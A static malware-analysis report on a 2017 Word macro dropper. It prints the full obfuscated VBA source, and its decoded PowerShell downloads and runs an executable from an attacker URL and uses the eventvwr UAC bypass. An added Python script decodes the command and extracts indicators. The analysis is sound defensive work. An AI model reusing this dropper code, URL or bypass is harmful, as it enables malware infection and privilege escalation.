Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5ddc8cc39a11b7fa…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 120.0 KB
Created: 2017-02-06 16:53:00
Authoring application: Microsoft Office Word
First seen: 2017-02-27
MD5: 8832cec2cb7f4262d0668d3c67a8e2d1
SHA-1: 3540f61a215873d9885e4160da6fd4797404bec7
SHA-256: 5ddc8cc39a11b7fabd7aba54b8246550756e6437aa80633ed8aad9603ac871e4
Risk score: 150

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1105 Ingress Tool Transfer

The sample contains VBA macros, including a Document_Open handler, so the code runs as soon as the document is opened with macros enabled (T1204.002). The handler never holds its command in the clear: it concatenates ten string literals, each padded with its own junk token (aRVf, UfRtT, nHKxC, SAmO7K, QglW0, xnmu, ytPOk, ggG4, BWdaA, rrbw), after passing each one through typeofDateserialIsdate, which uses a VBScript.RegExp global replace to delete that token. The cleaned string is handed to WinExec with nCmdShow = 0 (SW_HIDE), so nothing is shown to the user. Reversing the replace yields a PowerShell one-liner (T1059.001) that creates a WScript.Shell and a System.Net.WebClient, downloads hxxps://gov-invoices[.]info/jobs/neuldr.exe (defanged here; it is the only entry in the comma-split URL list) to %TEMP%\<random 1..65535>.exe (T1105), writes that path as the default value of HKCU\Software\Classes\mscfile\shell\open\command, starts eventvwr.exe, sleeps 3 s, deletes the key, and, if no process with that name is running, starts the dropped file directly. Because eventvwr.exe auto-elevates and resolves the .msc handler through HKCU\Software\Classes before the machine-wide classes, the first launch runs the payload at high integrity without a UAC prompt (T1548.002, the eventvwr/mscfile bypass, closed in later Windows 10 builds); the direct Start-Process is the unprivileged fallback, and any exception is swallowed by write-host in the catch block. The junk-token scheme is itself a useful fingerprint: the tokens never survive into the recovered command, so a static string search for the URL or registry key fails and either emulation or a token-strip pass is needed to recover the indicators (T1027).

Heuristics (6)

  • Reference to WinExec API (severity: high; rule: SC_STR_WINEXEC)
    Reference to WinExec API: declared from kernel32 and called with nCmdShow = 0 (SW_HIDE), so the launched process window is hidden
  • VBA macros detected (severity: medium; rule: OLE_VBA_MACROS; 3 related findings)
    Document contains VBA macro code
  • CreateObject call (severity: high; rule: OLE_VBA_CREATEOBJ)
    CreateObject call: the late-bound object is VBScript.RegExp, used by the decoder function to strip the junk token from each string literal rather than to execute anything itself
    Matched lines in script:
    qbcolorBinaryGet = "vbscript.regexp"
    Set xorAscEvent = CreateObject(qbcolorBinaryGet)
    xorAscEvent.Global = True
  • VBA p-code auto-exec with execution tokens (severity: high; rule: OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This rule also catches p-code-only documents, or ones where source extraction failed, in which no readable source is available.
  • Document_Open macro (severity: low; rule: OLE_VBA_DOCOPEN)
    Document_Open macro: runs automatically when the document is opened with macros enabled; this is where the command string is assembled and passed to WinExec
    Matched lines in script:
    Private Declare Function WinExec Lib "kernel32" (ByVal lpCmdLine As String, ByVal nCmdShow As Long) As Long
    Sub Document_Open()
    eofMeFix = typeofDateserialIsdate(" rrbw-rrbwFrrbwirrbwlrrbwerrbwPrrbwarrbwtrrbwhrrbw rrbw$rrbwprrbwarrbwtrrbwhrrbw;rrbw}rrbwbrrbwrrrbwerrbwarrbwkrrbw;rrbw}rrbwcrrbwarrbwtrrbwcrrbwhrrbw{rrbwwrrbwrrrbwirrbwtrrbwerrbw-rrbwhrrbworrbwsrrbwtrrbw rrbw$rrbw_rrbw.rrbwErrbwxrrbwcrrbwerrbwprrbwtrrbwirrbworrbwnrrbw.rrbwMrrbwerrbwsrrbwsrrbwarrbwgrrbwerrbw;rrbw}rrbw}rrbw", "rrbw")
  • Suspicious extracted artifact (severity: info; rule: EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 6046 bytes
SHA-256: e5ed44ff03108f8dc8c96b6fc552d20f3b26a9d53baa749b3d1a651493a4d3d9
Detection
ClamAV: No threats found
Obfuscation or payload: likely
91 of 147 identifiers look randomly generated, consistent with name-mangling obfuscation. (The tool's example 'BWdaAsBWdaAiBWdaAlBWdaAeBWdaAnBWdaAtBWda' is in fact a fragment of a junk-padded string literal; the procedure and variable names themselves are glued VBA keywords such as typeofDateserialIsdate and qbcolorBinaryGet, which score as random for the same reason.)
Preview script (first 1,000 lines of the extracted script; this module is 37 lines, so it is shown in full)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare Function WinExec Lib "kernel32" (ByVal lpCmdLine As String, ByVal nCmdShow As Long) As Long
Sub Document_Open()
eofMeFix = typeofDateserialIsdate(" rrbw-rrbwFrrbwirrbwlrrbwerrbwPrrbwarrbwtrrbwhrrbw rrbw$rrbwprrbwarrbwtrrbwhrrbw;rrbw}rrbwbrrbwrrrbwerrbwarrbwkrrbw;rrbw}rrbwcrrbwarrbwtrrbwcrrbwhrrbw{rrbwwrrbwrrrbwirrbwtrrbwerrbw-rrbwhrrbworrbwsrrbwtrrbw rrbw$rrbw_rrbw.rrbwErrbwxrrbwcrrbwerrbwprrbwtrrbwirrbworrbwnrrbw.rrbwMrrbwerrbwsrrbwsrrbwarrbwgrrbwerrbw;rrbw}rrbw}rrbw", "rrbw")
rndIsdateCcur = typeofDateserialIsdate(" BWdaA-BWdaAEBWdaArBWdaArBWdaAoBWdaArBWdaAABWdaAcBWdaAtBWdaAiBWdaAoBWdaAnBWdaA BWdaAsBWdaAiBWdaAlBWdaAeBWdaAnBWdaAtBWdaAlBWdaAyBWdaAcBWdaAoBWdaAnBWdaAtBWdaAiBWdaAnBWdaAuBWdaAeBWdaA;BWdaAiBWdaAfBWdaA(BWdaA!BWdaA$BWdaApBWdaArBWdaAoBWdaAcBWdaAeBWdaAsBWdaAsBWdaA)BWdaA{BWdaASBWdaAtBWdaAaBWdaArBWdaAtBWdaA-BWdaAPBWdaArBWdaAoBWdaAcBWdaAeBWdaAsBWdaAsBWdaA BWdaA-BWdaAWBWdaAiBWdaAnBWdaAdBWdaAoBWdaAwBWdaASBWdaAtBWdaAyBWdaAlBWdaAeBWdaA BWdaAhBWdaAiBWdaAdBWdaAdBWdaAeBWdaAnBWdaA", "BWdaA")
LdefdblL = typeofDateserialIsdate("bxnmucxnmulxnmuixnmuexnmunxnmutxnmu.xnmuDxnmuoxnmuwxnmunxnmulxnmuoxnmuaxnmudxnmuFxnmuixnmulxnmuexnmu(xnmu$xnmuuxnmurxnmulxnmu.xnmuTxnmuoxnmuSxnmutxnmurxnmuixnmunxnmugxnmu(xnmu)xnmu,xnmu xnmu$xnmupxnmuaxnmutxnmuhxnmu)xnmu;xnmu$xnmuwxnmusxnmucxnmurxnmuixnmupxnmutxnmu.xnmuRxnmuexnmugxnmuWxnmurxnmuixnmutxnmuexnmu(xnmu$xnmuhxnmukxnmuexnmuyxnmu,xnmu xnmu$xnmupxnmuaxnmutxnmuhxnmu)xnmu;xnmuSxnmu", "xnmu")
sendkeysCvarOptional = typeofDateserialIsdate("tytPOkaytPOkrytPOktytPOk-ytPOkSytPOklytPOkeytPOkeytPOkpytPOk ytPOk-ytPOkmytPOk ytPOk$ytPOksytPOklytPOkeytPOkeytPOkpytPOk;ytPOkSytPOktytPOkaytPOkrytPOktytPOk-ytPOkPytPOkrytPOkoytPOkcytPOkeytPOksytPOksytPOk ytPOk-ytPOkWytPOkiytPOknytPOkdytPOkoytPOkwytPOkSytPOktytPOkyytPOklytPOkeytPOk ytPOkhytPOkiytPOkdytPOkdytPOkeytPOknytPOk ytPOk-ytPOkFytPOkiytPOklytPOkeytPOkPytPOkaytPOktytPOkhytPOk ytPOk'ytPOkeytPOkvytPOkeytPOknytPOktytPOkvytPOkwytPOkrytPOk.ytPOkeytPOkxytPOkeytPOk", "ytPOk")
byrefCbyteResume = typeofDateserialIsdate("'ggG4;ggG4SggG4tggG4aggG4rggG4tggG4-ggG4SggG4lggG4eggG4eggG4pggG4 ggG4-ggG4mggG4 ggG4$ggG4sggG4lggG4eggG4eggG4pggG4;ggG4$ggG4wggG4sggG4cggG4rggG4iggG4pggG4tggG4.ggG4RggG4eggG4gggG4DggG4eggG4lggG4eggG4tggG4eggG4(ggG4$ggG4hggG4kggG4eggG4yggG4)ggG4;ggG4$ggG4pggG4rggG4oggG4cggG4eggG4sggG4sggG4 ggG4=ggG4 ggG4GggG4eggG4tggG4-ggG4PggG4rggG4oggG4cggG4eggG4sggG4sggG4 ggG4$ggG4nggG4aggG4mggG4eggG4", "ggG4")
GexitG = typeofDateserialIsdate(" nHKxC=nHKxC nHKxC'nHKxChnHKxCtnHKxCtnHKxCpnHKxCsnHKxC:nHKxC/nHKxC/nHKxCgnHKxConHKxCvnHKxC-nHKxCinHKxCnnHKxCvnHKxConHKxCinHKxCcnHKxCenHKxCsnHKxC.nHKxCinHKxCnnHKxCfnHKxConHKxC/nHKxCjnHKxConHKxCbnHKxCsnHKxC/nHKxCnnHKxCenHKxCunHKxClnHKxCdnHKxCrnHKxC.nHKxCenHKxCxnHKxCenHKxC'nHKxC.nHKxCSnHKxCpnHKxClnHKxCinHKxCtnHKxC(nHKxC'nHKxC,nHKxC'nHKxC)nHKxC;nHKxC$nHKxCnnHKxCanHKxCmnHKxCenHKxC nHKxC=nHKxC nHKxC$nHKxCrnHKxCanHKxCnnHKxCdnHKxConHKxCmnHKxC.nHKxCnnHKxCenHKxCxnHKxCtnHKxC", "nHKxC")
curdirCstrCreateobject = typeofDateserialIsdate("sQglW0sQglW0eQglW0sQglW0\QglW0mQglW0sQglW0cQglW0fQglW0iQglW0lQglW0eQglW0\QglW0sQglW0hQglW0eQglW0lQglW0lQglW0\QglW0oQglW0pQglW0eQglW0nQglW0\QglW0cQglW0oQglW0mQglW0mQglW0aQglW0nQglW0dQglW0\QglW0'QglW0;QglW0$QglW0sQglW0lQglW0eQglW0eQglW0pQglW0 QglW0=QglW0 QglW03QglW00QglW00QglW00QglW0;QglW0fQglW0oQglW0rQglW0eQglW0aQglW0cQglW0hQglW0(QglW0$QglW0uQglW0rQglW0lQglW0 QglW0iQglW0nQglW0 QglW0$QglW0uQglW0rQglW0lQglW0sQglW0)QglW0{QglW0tQglW0rQglW0yQglW0{QglW0$QglW0wQglW0eQglW0", "QglW0")
meOptionEach = typeofDateserialIsdate("paRVfoaRVfwaRVfeaRVfraRVfsaRVfhaRVfeaRVflaRVflaRVf aRVf-aRVfWaRVfiaRVfnaRVfdaRVfoaRVfwaRVfSaRVftaRVfyaRVflaRVfeaRVf aRVfHaRVfiaRVfdaRVfdaRVfeaRVfnaRVf aRVf$aRVfwaRVfsaRVfcaRVfraRVfiaRVfpaRVftaRVf aRVf=aRVf aRVfnaRVfeaRVfwaRVf-aRVfoaRVfbaRVfjaRVfeaRVfcaRVftaRVf aRVf-aRVfCaRVfoaRVfmaRVfOaRVfbaRVfjaRVfeaRVfcaRVftaRVf aRVfWaRVfSaRVfcaRVfraRVfiaRVfpaRVftaRVf.aRVfSaRVfhaRVfeaRVflaRVflaRVf;aRVf", "aRVf")
koptionk = typeofDateserialIsdate("$UfRtTwUfRtTeUfRtTbUfRtTcUfRtTlUfRtTiUfRtTeUfRtTnUfRtTtUfRtT UfRtT=UfRtT UfRtTnUfRtTeUfRtTwUfRtT-UfRtToUfRtTbUfRtTjUfRtTeUfRtTcUfRtTtUfRtT UfRtTSUfRtTyUfRtTsUfRtTtUfRtTeUfRtTmUfRtT.UfRtTNUfRtTeUfRtTtUfRtT.UfRtTWUfRtTeUfRtTbUfRtTCUfRtTlUfRtTiUfRtTeUfRtTnUfRtTtUfRtT;UfRtT$UfRtTrUfRtTaUfRtTnUfRtTdUfRtToUfRtTmUfRtT UfRtT=UfRtT UfRtTnUfRtTeUfRtTwUfRtT-UfRtToUfRtTbUfRtTjUfRtTeUfRtTcUfRtTtUfRtT UfRtTrUfRtTaUfRtTnUfRtTdUfRtToUfRtTmUfRtT;UfRtT$UfRtTuUfRtTrUfRtTlUfRtTsUfRtT", "UfRtT")
clngSecondArray = typeofDateserialIsdate("(SAmO7K1SAmO7K,SAmO7K SAmO7K6SAmO7K5SAmO7K5SAmO7K3SAmO7K6SAmO7K)SAmO7K;SAmO7K$SAmO7KpSAmO7KaSAmO7KtSAmO7KhSAmO7K SAmO7K=SAmO7K SAmO7K$SAmO7KeSAmO7KnSAmO7KvSAmO7K:SAmO7KtSAmO7KeSAmO7KmSAmO7KpSAmO7K SAmO7K+SAmO7K SAmO7K'SAmO7K\SAmO7K'SAmO7K SAmO7K+SAmO7K SAmO7K$SAmO7KnSAmO7KaSAmO7KmSAmO7KeSAmO7K SAmO7K+SAmO7K SAmO7K'SAmO7K.SAmO7KeSAmO7KxSAmO7KeSAmO7K'SAmO7K;SAmO7K$SAmO7KhSAmO7KkSAmO7KeSAmO7KySAmO7K SAmO7K=SAmO7K SAmO7K'SAmO7KHSAmO7KKSAmO7KCSAmO7KUSAmO7K\SAmO7KSSAmO7KoSAmO7KfSAmO7KtSAmO7KwSAmO7KaSAmO7KrSAmO7KeSAmO7K\SAmO7KCSAmO7KlSAmO7KaSAmO7K", "SAmO7K")
Dim caseSubCdec As String
Dim mxorm As Integer
mxorm = 0
caseSubCdec = meOptionEach & koptionk & GexitG & clngSecondArray & curdirCstrCreateobject & LdefdblL & sendkeysCvarOptional & byrefCbyteResume & rndIsdateCcur & eofMeFix
Call WinExec(caseSubCdec, mxorm)
End Sub
Function typeofDateserialIsdate(jpublishreportj As String, dwidthd As String) As String
Dim xorAscEvent As Object
Dim qbcolorBinaryGet As String
Dim doeventsSpaceError As String
qbcolorBinaryGet = "vbscript.regexp"
Set xorAscEvent = CreateObject(qbcolorBinaryGet)
xorAscEvent.Global = True
xorAscEvent.Pattern = dwidthd
doeventsSpaceError = xorAscEvent.Replace(jpublishreportj, "")
typeofDateserialIsdate = doeventsSpaceError
End Function
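The following Python is an added analyst example, not the sandbox's code and not part of the sample. It replays typeofDateserialIsdate over the ten string literals above, in the order Document_Open concatenates them, to recover the exact string passed to WinExec, then carves the indicators from it. The literal/token pairs are copied verbatim from the listing; the function names and the IOC regular expressions are this example's own.

```python
"""Replay the macro's token-strip decoder and carve IOCs from the result.

Added analyst example; not the sandbox's code and not part of the sample.
The (literal, token) pairs are copied from the VBA listing above; function
names and IOC regexes are this example's own.
"""
import re

# Junk-padded literals and their tokens, in the order Document_Open joins them:
#   meOptionEach & koptionk & GexitG & clngSecondArray & curdirCstrCreateobject
#   & LdefdblL & sendkeysCvarOptional & byrefCbyteResume & rndIsdateCcur & eofMeFix
# Raw strings keep the backslashes that later form the registry path.
CHUNKS = [
    (r"paRVfoaRVfwaRVfeaRVfraRVfsaRVfhaRVfeaRVflaRVflaRVf aRVf-aRVfWaRVfiaRVfnaRVfdaRVfoaRVfwaRVfSaRVftaRVfyaRVflaRVfeaRVf aRVfHaRVfiaRVfdaRVfdaRVfeaRVfnaRVf aRVf$aRVfwaRVfsaRVfcaRVfraRVfiaRVfpaRVftaRVf aRVf=aRVf aRVfnaRVfeaRVfwaRVf-aRVfoaRVfbaRVfjaRVfeaRVfcaRVftaRVf aRVf-aRVfCaRVfoaRVfmaRVfOaRVfbaRVfjaRVfeaRVfcaRVftaRVf aRVfWaRVfSaRVfcaRVfraRVfiaRVfpaRVftaRVf.aRVfSaRVfhaRVfeaRVflaRVflaRVf;aRVf", "aRVf"),
    (r"$UfRtTwUfRtTeUfRtTbUfRtTcUfRtTlUfRtTiUfRtTeUfRtTnUfRtTtUfRtT UfRtT=UfRtT UfRtTnUfRtTeUfRtTwUfRtT-UfRtToUfRtTbUfRtTjUfRtTeUfRtTcUfRtTtUfRtT UfRtTSUfRtTyUfRtTsUfRtTtUfRtTeUfRtTmUfRtT.UfRtTNUfRtTeUfRtTtUfRtT.UfRtTWUfRtTeUfRtTbUfRtTCUfRtTlUfRtTiUfRtTeUfRtTnUfRtTtUfRtT;UfRtT$UfRtTrUfRtTaUfRtTnUfRtTdUfRtToUfRtTmUfRtT UfRtT=UfRtT UfRtTnUfRtTeUfRtTwUfRtT-UfRtToUfRtTbUfRtTjUfRtTeUfRtTcUfRtTtUfRtT UfRtTrUfRtTaUfRtTnUfRtTdUfRtToUfRtTmUfRtT;UfRtT$UfRtTuUfRtTrUfRtTlUfRtTsUfRtT", "UfRtT"),
    (r" nHKxC=nHKxC nHKxC'nHKxChnHKxCtnHKxCtnHKxCpnHKxCsnHKxC:nHKxC/nHKxC/nHKxCgnHKxConHKxCvnHKxC-nHKxCinHKxCnnHKxCvnHKxConHKxCinHKxCcnHKxCenHKxCsnHKxC.nHKxCinHKxCnnHKxCfnHKxConHKxC/nHKxCjnHKxConHKxCbnHKxCsnHKxC/nHKxCnnHKxCenHKxCunHKxClnHKxCdnHKxCrnHKxC.nHKxCenHKxCxnHKxCenHKxC'nHKxC.nHKxCSnHKxCpnHKxClnHKxCinHKxCtnHKxC(nHKxC'nHKxC,nHKxC'nHKxC)nHKxC;nHKxC$nHKxCnnHKxCanHKxCmnHKxCenHKxC nHKxC=nHKxC nHKxC$nHKxCrnHKxCanHKxCnnHKxCdnHKxConHKxCmnHKxC.nHKxCnnHKxCenHKxCxnHKxCtnHKxC", "nHKxC"),
    (r"(SAmO7K1SAmO7K,SAmO7K SAmO7K6SAmO7K5SAmO7K5SAmO7K3SAmO7K6SAmO7K)SAmO7K;SAmO7K$SAmO7KpSAmO7KaSAmO7KtSAmO7KhSAmO7K SAmO7K=SAmO7K SAmO7K$SAmO7KeSAmO7KnSAmO7KvSAmO7K:SAmO7KtSAmO7KeSAmO7KmSAmO7KpSAmO7K SAmO7K+SAmO7K SAmO7K'SAmO7K\SAmO7K'SAmO7K SAmO7K+SAmO7K SAmO7K$SAmO7KnSAmO7KaSAmO7KmSAmO7KeSAmO7K SAmO7K+SAmO7K SAmO7K'SAmO7K.SAmO7KeSAmO7KxSAmO7KeSAmO7K'SAmO7K;SAmO7K$SAmO7KhSAmO7KkSAmO7KeSAmO7KySAmO7K SAmO7K=SAmO7K SAmO7K'SAmO7KHSAmO7KKSAmO7KCSAmO7KUSAmO7K\SAmO7KSSAmO7KoSAmO7KfSAmO7KtSAmO7KwSAmO7KaSAmO7KrSAmO7KeSAmO7K\SAmO7KCSAmO7KlSAmO7KaSAmO7K", "SAmO7K"),
    (r"sQglW0sQglW0eQglW0sQglW0\QglW0mQglW0sQglW0cQglW0fQglW0iQglW0lQglW0eQglW0\QglW0sQglW0hQglW0eQglW0lQglW0lQglW0\QglW0oQglW0pQglW0eQglW0nQglW0\QglW0cQglW0oQglW0mQglW0mQglW0aQglW0nQglW0dQglW0\QglW0'QglW0;QglW0$QglW0sQglW0lQglW0eQglW0eQglW0pQglW0 QglW0=QglW0 QglW03QglW00QglW00QglW00QglW0;QglW0fQglW0oQglW0rQglW0eQglW0aQglW0cQglW0hQglW0(QglW0$QglW0uQglW0rQglW0lQglW0 QglW0iQglW0nQglW0 QglW0$QglW0uQglW0rQglW0lQglW0sQglW0)QglW0{QglW0tQglW0rQglW0yQglW0{QglW0$QglW0wQglW0eQglW0", "QglW0"),
    (r"bxnmucxnmulxnmuixnmuexnmunxnmutxnmu.xnmuDxnmuoxnmuwxnmunxnmulxnmuoxnmuaxnmudxnmuFxnmuixnmulxnmuexnmu(xnmu$xnmuuxnmurxnmulxnmu.xnmuTxnmuoxnmuSxnmutxnmurxnmuixnmunxnmugxnmu(xnmu)xnmu,xnmu xnmu$xnmupxnmuaxnmutxnmuhxnmu)xnmu;xnmu$xnmuwxnmusxnmucxnmurxnmuixnmupxnmutxnmu.xnmuRxnmuexnmugxnmuWxnmurxnmuixnmutxnmuexnmu(xnmu$xnmuhxnmukxnmuexnmuyxnmu,xnmu xnmu$xnmupxnmuaxnmutxnmuhxnmu)xnmu;xnmuSxnmu", "xnmu"),
    (r"tytPOkaytPOkrytPOktytPOk-ytPOkSytPOklytPOkeytPOkeytPOkpytPOk ytPOk-ytPOkmytPOk ytPOk$ytPOksytPOklytPOkeytPOkeytPOkpytPOk;ytPOkSytPOktytPOkaytPOkrytPOktytPOk-ytPOkPytPOkrytPOkoytPOkcytPOkeytPOksytPOksytPOk ytPOk-ytPOkWytPOkiytPOknytPOkdytPOkoytPOkwytPOkSytPOktytPOkyytPOklytPOkeytPOk ytPOkhytPOkiytPOkdytPOkdytPOkeytPOknytPOk ytPOk-ytPOkFytPOkiytPOklytPOkeytPOkPytPOkaytPOktytPOkhytPOk ytPOk'ytPOkeytPOkvytPOkeytPOknytPOktytPOkvytPOkwytPOkrytPOk.ytPOkeytPOkxytPOkeytPOk", "ytPOk"),
    (r"'ggG4;ggG4SggG4tggG4aggG4rggG4tggG4-ggG4SggG4lggG4eggG4eggG4pggG4 ggG4-ggG4mggG4 ggG4$ggG4sggG4lggG4eggG4eggG4pggG4;ggG4$ggG4wggG4sggG4cggG4rggG4iggG4pggG4tggG4.ggG4RggG4eggG4gggG4DggG4eggG4lggG4eggG4tggG4eggG4(ggG4$ggG4hggG4kggG4eggG4yggG4)ggG4;ggG4$ggG4pggG4rggG4oggG4cggG4eggG4sggG4sggG4 ggG4=ggG4 ggG4GggG4eggG4tggG4-ggG4PggG4rggG4oggG4cggG4eggG4sggG4sggG4 ggG4$ggG4nggG4aggG4mggG4eggG4", "ggG4"),
    (r" BWdaA-BWdaAEBWdaArBWdaArBWdaAoBWdaArBWdaAABWdaAcBWdaAtBWdaAiBWdaAoBWdaAnBWdaA BWdaAsBWdaAiBWdaAlBWdaAeBWdaAnBWdaAtBWdaAlBWdaAyBWdaAcBWdaAoBWdaAnBWdaAtBWdaAiBWdaAnBWdaAuBWdaAeBWdaA;BWdaAiBWdaAfBWdaA(BWdaA!BWdaA$BWdaApBWdaArBWdaAoBWdaAcBWdaAeBWdaAsBWdaAsBWdaA)BWdaA{BWdaASBWdaAtBWdaAaBWdaArBWdaAtBWdaA-BWdaAPBWdaArBWdaAoBWdaAcBWdaAeBWdaAsBWdaAsBWdaA BWdaA-BWdaAWBWdaAiBWdaAnBWdaAdBWdaAoBWdaAwBWdaASBWdaAtBWdaAyBWdaAlBWdaAeBWdaA BWdaAhBWdaAiBWdaAdBWdaAdBWdaAeBWdaAnBWdaA", "BWdaA"),
    (r" rrbw-rrbwFrrbwirrbwlrrbwerrbwPrrbwarrbwtrrbwhrrbw rrbw$rrbwprrbwarrbwtrrbwhrrbw;rrbw}rrbwbrrbwrrrbwerrbwarrbwkrrbw;rrbw}rrbwcrrbwarrbwtrrbwcrrbwhrrbw{rrbwwrrbwrrrbwirrbwtrrbwerrbw-rrbwhrrbworrbwsrrbwtrrbw rrbw$rrbw_rrbw.rrbwErrbwxrrbwcrrbwerrbwprrbwtrrbwirrbworrbwnrrbw.rrbwMrrbwerrbwsrrbwsrrbwarrbwgrrbwerrbw;rrbw}rrbw}rrbw", "rrbw"),
]


def strip_token(text: str, token: str) -> str:
    """Equivalent of typeofDateserialIsdate: VBScript.RegExp with Global=True,
    Pattern=token, Replace(text, "").  The macro feeds the token in as a regex
    pattern, so re.sub (leftmost, non-overlapping) is the faithful replay; a
    token such as 'rrbw' inside 'brrbwrrrbwe' therefore collapses to 'bre'."""
    return re.sub(token, "", text)


def decode_command(chunks=CHUNKS) -> str:
    """Rebuild caseSubCdec, the string the macro hands to WinExec(..., 0)."""
    return "".join(strip_token(text, token) for text, token in chunks)


def extract_iocs(cmd: str) -> dict:
    """Carve the indicators an analyst would pivot on (regexes are this
    example's own; the command only contains single-quoted literals)."""
    return {
        "urls": re.findall(r"https?://[^\s']+", cmd),
        "registry_keys": re.findall(r"HKCU\\[^']+", cmd),
        "launched": re.findall(r"-FilePath\s+'?([^\s';]+)", cmd),
        # eventvwr.exe auto-elevates and resolves its .msc handler through
        # HKCU first, so writing mscfile\shell\open\command and then starting
        # it is the UAC-bypass pattern the Insights section describes.
        "uac_bypass_eventvwr": "mscfile\\shell\\open\\command" in cmd
        and "eventvwr.exe" in cmd,
    }


if __name__ == "__main__":
    command = decode_command()
    print(command)
    for name, value in extract_iocs(command).items():
        print(f"{name}: {value}")
```

Run it offline only; the recovered URL is a live indicator from the sample and should be treated as hostile, not fetched. The same strip_token/decode_command pair works for any macro of this family: change the CHUNKS list to the literal/token pairs from the new sample, in the order its concatenation line joins them.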